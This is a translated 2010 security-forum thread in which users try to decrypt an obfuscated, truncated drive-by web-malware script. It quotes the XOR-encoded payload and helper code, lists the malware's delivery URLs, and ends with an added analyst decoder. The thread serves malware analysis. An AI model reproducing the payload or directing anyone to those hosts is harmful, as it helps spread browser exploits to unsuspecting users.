Rising Kaka Security Forum
Thread: How do I decrypt this piece of web malware (网马)?? (from Web Malware Decryption Bounty, Issue 45)
暗夜的雪 - 2010-2-9 17:27:00
The web-malware code is as follows:
[quote]
<script>
strHTML="";
strHTML+="Z%15WE%5CDME%15AT_%1A%5C%07%1B%08%10%1B%0F%0BJ@%00%17%0FA%16%06%3F2%09";
strHTML+="%15%05F%5EE@%19%09%07%5DP%17YT%04%08@%29XGV6P%11%0C%16E@%06%3F28l%10UE";
strHTML+="%15W%04%16MF%0Co2E%00GB%02KCV%1C%13%5EE%08T%15%18sJG%07%1F%1C%1E%0E93%";
strHTML+="13%07A%17%0EK%13%5C%15R%1B%01%00%07U%03NM%05%1F%0E%5D%5C_A%0EL%06%1E%0";
strHTML+="E93%13%07A%17%00%18%0EAQ%0B%0D%5EI%1FG%16%16U%04%01%01%1DG%08WV%25%16%";
strHTML+="1E%0E93%12%0EZ%5B%07%10QOY%07%0D%5EE_Y_%10JT%18%19Z%19%05W%5D%1BBVG%14";
strHTML+="U%0DF%0E%17%00%16@%14W%11%17KXY%02%1BSI%0ABM%0A%1B%038l%02Q%5BP@%5CE%0";
strHTML+="4%08%3Ah%5E%5C%13%1D%0B%5E%09%0A%5EY%03%1B%5C_%1BP%03%5B%13%1EOFO%17TF";
strHTML+="K%04%1Fh%5E%3F%18%0EAY%0AC%12%11%5B%0D%13HE%05%0A%1F%7B%5DTY%03%05@pTF";
strHTML+="%5B%04%01V%1FK%03%3EkC%03%11%19%5EU%0F%13%5EE%08T%15%18s%5BA%0F%10QozV";
strHTML+="S%00%05G%1F@wd%22%04RMjAE%00R%07%16%0ET%07L%10%11%0EklQ%0A%5BQNE%27AE%";
strHTML+="03A%1BH%0Eoi%5C%1FG%10@%0BMW%18Y58%5D%1B%16%13G_%1D%06%10%5Ek9RLHF%12%";
strHTML+="5DJS%10%0A%3AoVM%15%13B%0A%10EQ%5B%02%09C%1E%0E93%03%09A%1F%0B%05%03Z%";
strHTML+="5C%5E%06%17%5DR%0BT%17%0D%5DXI%13%1BCS%09%14%1C%5D%08%04%02%0FZ%02%07Y";
strHTML+="R%18J%1C%19%17KHL%0AQ%09K%23G%03TGYA%03NQl%5Ci%10%5E%1BPV%16%5B%5BIPK%";
strHTML+="18DLJ%12Z%0D%01%09FLKFYA%13%15%09Rn%07dEM%14%10Y59%07Z%10KS%0C%07%5EY_";
strHTML+="TV%0A%08%13%19%11N%12%14MLZVSK%0B@s%03LR2Z%17%11ZTx%07Y%06%06%12%19%07";
strHTML+="c%01e%1C%5D%1B%14TT@Z%0DNV%1EBCN%1C8h_%16BT%17Z%13%11X%3Ch";
function XOR(strV, strPass) {
  var intPassLength = strPass.length;
  var re = "";
  for (var i = 0; i < strV.length; i++) {
    re += String.fromCharCode(strV.charCodeAt(i) ^ strPass.charCodeAt(i % intPassLength));
  }
  return (re);
}
var STR =
{
  hexcase: 0,  /* hex output format. 0 - lowercase; 1 - uppercase */
  b64pad: "",  /* base-64 pad character. "=" for strict RFC compliance */
  chrsz: 8,    /* bits per input character. 8 - ASCII; 16 - Unicode */

  b64_hmac_md5:
    function(key, data) { return binl2b64(core_hmac_md5(key, data)); },

  b64_md5:
    function(s) { return binl2b64(core_md5(str2binl(s), s.length * this.chrsz)); },

  binl2b64:
    function(binarray) {
      var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
      var str = "";
      for (var i = 0; i < binarray.length * 4; i += 3)
      {
        var triplet = (((binarray[i >> 2] >> 8 * (i % 4)) & 0xFF) << 16)
                    | (((binarray[i + 1 >> 2] >> 8 * ((i + 1) % 4)) & 0xFF) << 8)
                    |  ((binarray[i + 2 >> 2] >> 8 * ((i + 2) % 4)) & 0xFF);
        for (var j = 0; j < 4; j++)
        {
          if (i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
          else str += tab.charAt((triplet >> 6 * (3 - j)) & 0x3F);
        }
      }
      return str;
    },

  binl2hex:
    function(binarray) {
      var hex_tab = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
      var str = "";
      for (var i = 0; i < binarray.length * 4; i++)
      {
        str += hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 + 4)) & 0xF) +
               hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 0xF);
      }
      return str;
    },

  binl2str:
    function(bin) {
      var str = "";
      var mask = (1 << this.chrsz) - 1;
      for (var i = 0; i < bin.length * 32; i += this.chrsz)
        str += String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask);
      return str;
    },

  bit_rol:
    function(num, cnt) { return (num << cnt) | (num >>> (32 - cnt)); },

  core_hmac_md5:
    function(key, data) {
      var bkey = str2binl(key);
      if (bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);

      var ipad = Array(16), opad = Array(16);
      for (var i = 0; i < 16; i++)
      {
        /* the forum's BBCode ate the [i] subscripts here; restored */
        ipad[i] = bkey[i] ^ 0x36363636;
        opad[i] = bkey[i] ^ 0x5C5C5C5C;
      }

      var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
      return core_md5(opad.concat(hash), 512 + 128);
    },

  core_md5:
    function(x, len) {
      /* append padding */
      x[len >> 5] |= 0x80 << ((len) % 32);
      x[(((len + 64) >>> 9) << 4) + 14] = len;

      var a = 1732584193;
      var b = -271733879;
      var c = -1732584194;
      var d = 271733878;

      for (var i = 0; i < x.length; i += 16)
      {
        var olda = a;
        var oldb = b;
        var oldc = c;
        var oldd = d;

        a = this.md5_ff(a, b, c, d, x[i + 0], 7, -680876936);
        d = this.md5_ff(d, a, b, c, x[i + 1], 12, -389564586);
        c = this.md5_ff(c, d, a, b, x[i + 2], 17, 606105819);
        b = this.md5_ff(b, c, d, a, x[i + 3], 22, -1044525330);
        a = this.md5_ff(a, b, c, d, x[i + 4], 7, -176418897);
        d = this.md5_ff(d, a, b, c, x[i + 5], 12, 1200080426);
        c = this.md5_ff(c, d, a, b, x[i + 6], 17, -1473231341);
        b = this.md5_ff(b, c, d, a, x[i + 7], 22, -45705983);
        a = this.md5_ff(a, b, c, d, x[i + 8], 7, 17
[/quote]
This has been bugging me for 10 days now~~~~ Teachers and experts, please come take a look~~~~

User system info: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727)
networkedition - 2010-2-9 17:32:00
Decrypt it with the 神器 (decryption tool); just run the script directly.
迷失の坏坏 - 2010-2-9 18:02:00
:kaka1: The teacher settles it in one sentence.
暗夜的雪 - 2010-2-9 18:51:00

[Attachment: your user group cannot download or view attachments]
Is it like this, teacher? There is no eval function in it, and it says it cannot run. Does the code need to be adjusted first?
ty88 - 2010-2-9 23:08:00
http://bbs.ikaka.com/showtopic.aspx?topicid=8694694&page=2
I explained it clearly in post #19.
DragonKid - 2010-2-9 23:31:00
Teacher, your explanation is way too brief~~~
I tried it the way you explained and got the same result as the poster above.
Waiting for the teacher to give a detailed explanation.
Confused~~~:kaka8:
暗夜的雪 - 2010-2-10 1:35:00
1. There is no document.write function in the download file for that issue~~~~:kaka4:
2. I suspect this code contains a "terminator" (终止符) that causes some tools to fail to capture the full code. But what exactly is this "terminator"?
3. Outputting it directly with alert shows no dialog box at all:kaka18: I really could cry~~~~
4. Could this have something to do with the browser version??

Thanks, masters; bowing down to you here~~~~~:kaka9:
Luke8 - 2010-2-10 1:53:00
Why does this look a lot like it has Base64 in it~~? Should we decode the Base64 first and then extract the address?
networkedition - 2010-2-10 10:06:00
Where is the URL?:kaka6: Also, is your code complete?
暗夜的雪 - 2010-2-10 11:19:00
http://v.vv.wwvv.us/images/css/of.htm
But it seems to be dead already, and I can also see the code is incomplete, as in post #7~ Thanks for answering, teacher~
networkedition - 2010-2-10 12:22:00
It isn't dead; there is a document.write inside it. When decrypting with the 神器 you need to delete the script tags.

[Attachment: your user group cannot download or view attachments]
暗夜的雪 - 2010-2-10 13:57:00
Log is generated by FreShow.
[wide]http://v.vv.wwvv.us/images/css/of.htm
    [object]http://v.vv.wwvv.us/images/css/of.js
        [object]http://vvvv.wwvv.us/images/css/css.swf
Oh heavens, thank you teacher. After using all sorts of tools I finally got this stubborn malware out. But why does FreShow capture the code incompletely??
ty88 - 2010-2-10 13:57:00
It's because of the terminator.
辛达星郁 - 2010-2-10 14:13:00
Because of the terminator :kaka2: What is a terminator?
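An analyst-side decoder for the scheme the posted sample appears to use (a %XX-escaped string XORed with a repeating key, as in its XOR function), added here as an example for this thread and not taken from the script itself. The key, the plaintext and the unescape step are assumptions (the page shows neither the key nor the rest of the script); the decoder also reports NUL bytes (%00, which do appear in the posted strHTML), since a tool that reads the buffer as a NUL-terminated string stops at the first one, which is one plausible reading of the "terminator" mentioned above.

```javascript
// Added example (not the thread's code): decoder for %XX text XORed with a
// repeating key. Key and plaintext below are constructed, not from the page.

// Same transform as the sample's XOR(strV, strPass): byte-wise XOR with a
// key that repeats every key.length characters (XOR is its own inverse).
function xorWithKey(str, key) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode(str.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Equivalent of the legacy unescape(): %XX escapes back to characters.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Escape like legacy escape(); used only to build the constructed sample.
function percentEncode(s) {
  let out = "";
  for (const ch of s) {
    const safe = /[A-Za-z0-9@*_+\-./]/.test(ch);
    out += safe ? ch : "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0");
  }
  return out;
}

// Indexes of NUL bytes (%00) in the decoded buffer: a consumer that treats
// the buffer as a C-style string stops at the first one (truncated output).
function nulPositions(s) {
  const pos = [];
  for (let i = 0; i < s.length; i++) if (s.charCodeAt(i) === 0) pos.push(i);
  return pos;
}

// What a NUL-terminated consumer sees of the same buffer.
function cStringView(s) {
  const i = s.indexOf("\0");
  return i < 0 ? s : s.slice(0, i);
}

// Constructed sample (not from the page): 'a' XOR 'a' at index 1 yields %00,
// so a NUL-terminated view keeps only the first byte of the buffer.
const SAMPLE_KEY = "kaka";
const SAMPLE_PLAIN = 'var s="<b>hello</b>";document.write(s);';
const SAMPLE_ENCODED = percentEncode(xorWithKey(SAMPLE_PLAIN, SAMPLE_KEY));
```

Run against the real sample, the percentDecode step alone is enough to see where the %00 bytes land; the XOR step needs the key that the truncated post does not include.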